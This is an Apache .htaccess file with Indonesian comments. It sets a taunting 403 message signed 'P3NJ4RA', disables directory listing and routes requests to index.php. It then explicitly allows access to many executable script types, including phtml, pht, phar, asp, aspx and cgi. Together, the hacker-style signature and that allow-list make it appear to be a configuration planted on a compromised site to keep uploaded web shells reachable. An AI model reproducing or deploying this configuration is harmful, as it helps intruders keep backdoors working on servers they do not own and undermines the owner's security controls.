# ========================
# PESAN 403 CUSTOM
# ========================
ErrorDocument 403 "Silahkan Retas Kalo Ingin Masuk P3NJ4RA!!!"

# ========================
# MATIKAN INDEXING
# ========================
Options -Indexes

# ========================
# REWRITE STANDARD
# ========================
<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /

    # JANGAN 403 halaman root (/), tapi 403 kalau akses subfolder/ langsung
    RewriteCond %{REQUEST_URI} /$
    RewriteCond %{REQUEST_URI} !^/$
    RewriteRule ^ - [F]

    # Front controller
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
</IfModule>

<Files *.php>
    Allow from all
</Files>
<Files *.phtml>
    Allow from all
</Files>
<Files *.pht>
    
    Allow from all
</Files>
<Files *.phar>
    
    Allow from all
</Files>
<Files *.shtml>
    
    Allow from all
</Files>
<Files *.aspx>
    
    Allow from all
</Files>
<Files *.asp>
    
    Allow from all
</Files>
<Files *.cgi>
    
    Allow from all
</Files>
